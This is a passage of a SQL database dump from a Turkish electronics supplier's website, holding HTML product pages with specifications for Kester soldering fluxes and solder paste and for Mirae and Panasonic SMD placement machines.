/>\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"http://www.3s-technologies.com.tr/images/urunler/kester_flux.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>979 FLUX</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Su bazlı</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Organik</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmiyen</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Yüksek kaliteli ve düşük arıza oranlı lehimleme gerçekleştirmek üzere geliştirilmiş bir flux</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">VOC içermeyen fluxlar içinde en iyi ıslatma ve en parlak lehim noktaları sağlamaktadır</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">KESTER 979 güvenilirlikten ödün vermeden mükemmel lehimleme özellikleri sunar.</li>\r\n</ul>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Ürün</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">979&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Tip</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">VOC-free&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;No-clean</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">Evet&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;Specific Gravity</td>\r\n<td style=\"text-align: center;\">1.020 +/- 0.010&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Katı madde oranı</td>\r\n<td style=\"text-align: center;\">Tipik 4.5</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Asit numarası</td>\r\n<td style=\"text-align: center;\">40.0+/-3.0mg KOH/g</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>İnceltici</td>\r\n<td style=\"text-align: center;\">DI Su</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','979','','','','955lc'),(35,'Kurşunlu Krem Lehim','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER R256 KURŞUNLU KREM LEHİM</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Tüm KESTER krem lehim formülleri mevcut en yüksek kaliteli saf materyaller kullanılarak üretilir. KESTER\'in dünya çapındaki araştırma tesislerinin birlikte çalışarak hazırladıkları krem lehim formülleri, tüm elektronik üreticilerine en son teknolojik gelişmeleri getirir.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/Kester_%20KremLehim.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>R256 KURŞUNSUZ KREM LEHİM</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Kurşunlu üretilebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hava ve nitrojen ortamlarına uygun</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmez</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Hassas bacak aralıklı malzemeleriniz (0.4mm pitch) için mükemmel baskı kalitesi verir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">200mm/s\'ye kadar baskı hızı sağlar.</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">120dk mola sonra bile kusursuz krem lehim baskısı mümkündür</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Krem lehim baskılı kartlar 8 saat bekleyebilir</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Uzun raf ömrü (6ay)</li>\r\n</ul>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: left;\">&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">ÜRÜN&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">R256</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Viscosity (tipik)</td>\r\n<td style=\"margin-left: 30px;\">1400 poise&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;İlk tackiness</td>\r\n<td style=\"margin-left: 30px;\">40 gr&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Sınıflandırma</td>\r\n<td style=\"margin-left: 30px;\">ROL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Raf ömrü</td>\r\n<td style=\"margin-left: 30px;\">6 ay</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Wetting özelliği</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Baskı hızı</td>\r\n<td>200mm/sn kadar</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Elekten bırakma</td>\r\n<td>Mükemmel</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Reflow</td>\r\n<td>Hava veya Nitrojen</td>\r\n</tr>\r\n</tbody>\r\n</table>','R256','','','','krem-lehim-31-32-33-34'),(38,'Flux (Alkol-bazlı)','<h5 style=\"text-align: left;\">KESTER ALKOL-BAZLI FLUX</h5>\r\n<p>&nbsp;</p>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/kester_flux.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>&nbsp;</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>955LC FLUX</strong></p>\r\n<ul>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Alkol bazlı</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Düşük-katı maddeli</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Temizleme gerektirmiyen</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Yüksek kaliteli ve düşük arıza oranlı lehimleme gerçekleştirmek üzere geliştirilmiş bir flux</li>\r\n<li style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Lehimleme sonrası bıraktığı atık minimumdur ve yapışkan değildir&nbsp;</li>\r\n</ul>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><span style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</span></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p>&nbsp;</p>\r\n<table style=\"margin-left: 30px;\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Ürün</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">955LC</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Tip</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">ORL0</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;No-clean</td>\r\n<td style=\"text-align: center; margin-left: 30px;\">Evet&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;Specific Gravity</td>\r\n<td style=\"text-align: center;\">0.806&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Katı madde oranı</td>\r\n<td style=\"text-align: center;\">Tipik 2.1</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>Asit numarası</td>\r\n<td style=\"text-align: center;\">15</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td>İnceltici</td>\r\n<td style=\"text-align: center;\">Thinner 108-S</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>','955LC','','','','955lc-37'),(39,'MX400 - IPC: 42,000cph','<h5 style=\"text-align: left;\"><span style=\"font-size: 0.83em; color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px;\">Mirae Mx400/400P SMD Dizgi Makinası&nbsp;</span></h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/mirae/1226656899.jpg\" alt=\"\" border=\"0\" /><img src=\"images/mirae/Mirae%20Mx_400.JPG\" alt=\"\" width=\"300\" height=\"282\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>İki kafa üzerine yerleştirilmiş altışar hızlı modül ile 42.000cph dizgi hızı&nbsp;(Mx400)</strong></li>\r\n<li><strong>6 eksen hızlı modül kafası ve 3 eksen esnek modül kafası ile 31.000cph dizgi&nbsp;hızı ve esnek üretim (Mx400P)</strong></li>\r\n<li><strong>Kompakt&nbsp;boyutları ile sınıfında birim alana&nbsp;&nbsp;&nbsp; maksimum üretkenlik</strong></li>\r\n<li><strong>Çiftli konveyör sistemi ile aynı anda iki PCB\'nin dizgisini yapabilme</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p><a href=\"http://www.mirae.com/product/pro_01_4.asp\">&nbsp;</a></p>\r\n<table style=\"margin-left: 30px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Model İsmi</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Mx400</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Mx400P</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Performans</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Dizgi Hızı (IPC 9850)</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Chip (1005)</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">42000CPH (0.090sn/chip)</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">31000CPH (0.116sn/chip)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">QFP (208)</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">3500CPH</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Dizgi Doğruluğu</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Chip (3s)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">±0.050mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">QFP (3s)</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">±0,025mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Malzeme Aralığı</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"142\" height=\"17\">Sabit Kamera (FOV 24)</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Tek FOV</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0603~18mm kare (24x18mm dikdörtgen) / 0402mm Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Sabit Kamera (FOV 36)</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Tek FOV</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~32mm kare (42x32mm dikdörtgen)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Çoklu FOV</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~50mm kare (90x30mm dikdörtgen)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"2\" width=\"142\" height=\"34\">Minimum Bacak Aralığı</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">FOV24 Kamera</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0.30mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">FOV36 Kamera</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0.38mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Kart ve Transfer Parametreleri</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"3\" width=\"142\" height=\"51\">Kart Boyutları</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Minimum&nbsp;&nbsp;(LxWxT)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">50x50x0.4mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Maximum&nbsp;&nbsp;(LxWxT)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">410x460x5.0mm / 680x460x5.0mm Opsiyon</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Maximum&nbsp;&nbsp;Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">2kg</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Kart En Ayar</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Manüel</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"4\" width=\"620\" height=\"17\">Genel Özellikler</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Kafa Sayısı</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">6 Modül + 6 Modül</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">6 Modül + 3 Hassas&nbsp;</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Maksimum Feeder Sayısı (8mm)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">80</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" rowspan=\"3\" width=\"142\" height=\"51\">Feeder Tipleri</td>\r\n<td style=\"margin-left: 30px;\" width=\"119\">Makara Tip</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">8 (2P,4P), 12, 16, 24, 32, 44, 56, 72, 88mm</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">\r\n<p style=\"margin-left: 30px;\">Tray</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">-</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">TF5 (20 Tray Feeder Unit)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"119\" height=\"17\">Diğer</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">Vibration Stick Feeder, Manual Tray</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Güç Bağlantısı</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">3 Faz 200/208/220/230/240/380/400/415/430 Volts</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Güç Tüketimi</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~5 KVA</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Hava Bağlantısı</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">0.54Mps (5.4bar)</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Hava Tüketimi</td>\r\n<td style=\"margin-left: 30px;\" width=\"179\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~300N?/min</p>\r\n</td>\r\n<td style=\"margin-left: 30px;\" width=\"180\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~2400N?/min</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Ağırlık</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">~1550kg</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"261\" height=\"17\">Makine Boyutları (WxDxH)</td>\r\n<td style=\"margin-left: 30px;\" colspan=\"2\" width=\"359\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">1200x1900x1500mm</p>\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>&nbsp;</p>\r\n<div style=\"text-align: left;\">&nbsp;</div>\r\n<div style=\"text-align: left; margin-left: 30px;\"><br /><hr class=\"system-pagebreak\" style=\"width: 850.40625px; word-spacing: 0px;\" title=\"Malzemeler\" />&nbsp;\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Boyut Olarak;\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">0201 chip – 35mm kare IC (standart) veya 50mm kare IC (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme paketlenmesi</li>\r\n</ul>\r\n<ul>\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Makara</li>\r\n<li style=\"text-align: left;\">Tüp</li>\r\n<li style=\"text-align: left;\">Dökme</li>\r\n<li style=\"text-align: left;\">Kesik</li>\r\n<li style=\"text-align: left;\">Şerit</li>\r\n<li style=\"text-align: left;\">Tepsi&nbsp;</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul style=\"list-style-type: square; text-align: left;\">\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: square;\">\r\n<li style=\"text-align: left;\">Malzeme Paket Tipi</li>\r\n</ul>\r\n<ul>\r\n<li style=\"list-style-type: none;\">\r\n<ul style=\"list-style-type: circle;\">\r\n<li style=\"text-align: left;\">Chip (0201,0402,0603,…)</li>\r\n<li style=\"text-align: left;\">SOIC</li>\r\n<li style=\"text-align: left;\">PLCCQ</li>\r\n<li style=\"text-align: left;\">FPBGA,</li>\r\n<li style=\"text-align: left;\">CSP (Vision Opsiyonu ile)</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</div>','MX400','','','','mx200lp-3'),(40,'Maks 77,000cph / Moduler','<h2><span style=\"text-align: left;\">PANASONIC SMD Dizgi Makinesi (Ultra-Hızlı)</span></h2>\r\n<ul>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum Hız: 77,000cph</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">16, 12, 8 veya 3 nozzle ile kafa seçenekleri</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Maksimum 750 x 550mm PCB</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">0.030mm dizgi hassasiyeti</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">01005 ile 100x90mm arası malzemelerin dizgisi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">8 - 104mm feederler + Tray Ünitesi</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Gelişmiş MMI</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Modüler ve esnek</li>\r\n<li style=\"text-align: left; margin-left: 30px;\">Hızlı ürün dönüşümü</li>\r\n</ul>\r\n<p style=\"text-align: left; margin-left: 30px;\"> </p>\r\n<table id=\"zebra-blue\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>\r\n<p>MODEL ADI</p>\r\n</td>\r\n<td colspan=\"4\">\r\n<p style=\"text-align: center;\"> NM-EJM7D</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Kafa</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>16-nozzle</p>\r\n</td>\r\n<td style=\"text-align: center;\">12-nozzle</td>\r\n<td style=\"text-align: center;\">8-nozzle</td>\r\n<td style=\"text-align: center;\">3-nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>PCB Boyutları</p>\r\n</td>\r\n<td style=\"text-align: center;\" colspan=\"4\">\r\n<p>50x50mm - 750 x 550mm</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p>Hız (Maks)</p>\r\n</td>\r\n<td style=\"text-align: center;\">\r\n<p>77,000cph</p>\r\n</td>\r\n<td style=\"text-align: center;\">64,500cph</td>\r\n<td style=\"text-align: center;\">40,000cph</td>\r\n<td style=\"text-align: 